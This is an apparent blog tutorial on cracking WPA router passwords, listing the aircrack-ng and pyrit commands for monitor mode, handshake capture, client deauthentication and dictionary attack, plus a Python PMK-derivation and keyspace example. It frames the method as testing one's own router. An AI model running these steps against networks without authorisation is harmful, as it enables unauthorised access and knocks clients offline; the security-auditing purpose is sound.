This is the follow-on post to the pyrit set-up.
Once it's been set up you are able to test the strength of your WPA encrypted router.
There are a few important points to note when cracking WPA.
Firstly, it has to be your own router or you must have permission from the administrator.
Secondly, the key that you're cracking has to be inside the list or dictionary file.
If the password isn't in the dictionary file, the key will not be cracked.
Note that 'insecurepass' is different to 'Insecurepass'; matching is case-sensitive.
Finally, the access point has to have a client connected, because to capture a handshake the connected client is de-authenticated so that it reconnects and the handshake can be captured.
The method behind WPA cracking is different to that of WEP. WEP is cracked by collecting a large number of IV packets (the IVs repeat). WPA is cracked by firstly capturing the handshake, where the client connects to the AP, then brute forcing the captured handshake using a dictionary or word list.
The commands:
airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 11 -w output --bssid bssid mon0
aireplay-ng --deauth 0 -a bssid -c client mon0
Ctrl + C to cancel the deauth and capture
pyrit eval
pyrit -i pass.lst import_passwords
pyrit -e j2neonAP create_essid
pyrit eval
pyrit batch
pyrit verify
pyrit -o wpadb export_hashdb
aircrack-ng -r wpadb output-01.cap
Commands will differ for each WPA crack and access point. Firstly, -c is the channel of the AP (mine is on 11). -w is simply the name prefix of the capture file, and each bssid is different.
In the pyrit section pass.lst is a simple list that I created for the purpose of this video and contains a few keys. This should be replaced with a decent word list or password list.
j2neonAP is my ESSID; again this differs for each AP, and it is also used as the salt during the batch process.
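To make the salt point concrete, here is an added Python example (not part of the original post and not pyrit's code) that derives the WPA/WPA2-PSK Pairwise Master Key the same way pyrit's batch step does: PBKDF2-HMAC-SHA1 over the passphrase, salted with the ESSID, 4096 iterations, 32 bytes out. It shows why the ESSID must be given to pyrit (a table computed for one network is useless for another), why the hit is case-sensitive, and, from the defender's side, how fast the keyspace grows with passphrase length so you can judge whether a router passphrase would survive a dictionary run. The ESSID j2neonAP and the wordlist are taken from the post; the passphrase values and the guess rate are constructed for illustration.

```python
import hashlib
import hmac
import time

PBKDF2_ITERATIONS = 4096  # fixed by the WPA/WPA2-PSK specification (IEEE 802.11i)
PMK_LENGTH = 32           # PMK is 256 bits

def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 rounds, 32 bytes).
    This is the per-candidate work pyrit's batch step precomputes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               essid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LENGTH)

def passphrase_in_wordlist(candidates, essid: str, router_pmk: bytes):
    """Audit helper: return the wordlist entry whose PMK matches the router's PMK,
    or None. Matching is exact, so a case difference never matches."""
    for word in candidates:
        if hmac.compare_digest(derive_pmk(word, essid), router_pmk):
            return word
    return None

def candidate_space(length: int, alphabet_size: int) -> int:
    """Number of passphrases of a given length over an alphabet of that size."""
    return alphabet_size ** length

def seconds_to_exhaust(length: int, alphabet_size: int, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at the given PMK rate."""
    return candidate_space(length, alphabet_size) / guesses_per_second

def measure_guess_rate(essid: str, samples: int = 20) -> float:
    """Rough single-core PMK derivations per second on this machine."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk("benchmark%d" % i, essid)
    return samples / (time.perf_counter() - start)

if __name__ == "__main__":
    essid = "j2neonAP"                       # ESSID from the post; the salt
    router_pmk = derive_pmk("insecurepass", essid)   # constructed router passphrase
    wordlist = ["password", "Insecurepass", "insecurepass", "letmein"]  # stands in for pass.lst

    print("hit:", passphrase_in_wordlist(wordlist, essid, router_pmk))      # insecurepass
    print("same passphrase, other ESSID matches?",
          derive_pmk("insecurepass", "otherAP") == router_pmk)              # False

    rate = measure_guess_rate(essid)
    print("approx. PMKs/second here: %.0f" % rate)
    # A random 8-char alphanumeric passphrase versus a 16-char one at that rate:
    for length in (8, 16):
        secs = seconds_to_exhaust(length, 62, rate)
        print("length %d over [a-zA-Z0-9]: %.3g years worst case" % (length, secs / 31_557_600))
```

The two printed checks are the post's caveats in code form: the hit only occurs when the exact, case-matching passphrase is in the list, and a PMK computed against one ESSID never matches another network. The keyspace figures are the mitigation: a long random passphrase puts the worst case far outside any practical dictionary run, even on GPU rates many orders of magnitude above this single-core number.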
Videos:
Blip.tv link:
Cracking WPA using pyrit and aircrack Blip.tv
YouTube link:
Cracking WPA using pyrit and aircrack YouTube
Sorry again, for the square mouse camtasia, VB and BT5 don't play together nicely.
Thanks
2neon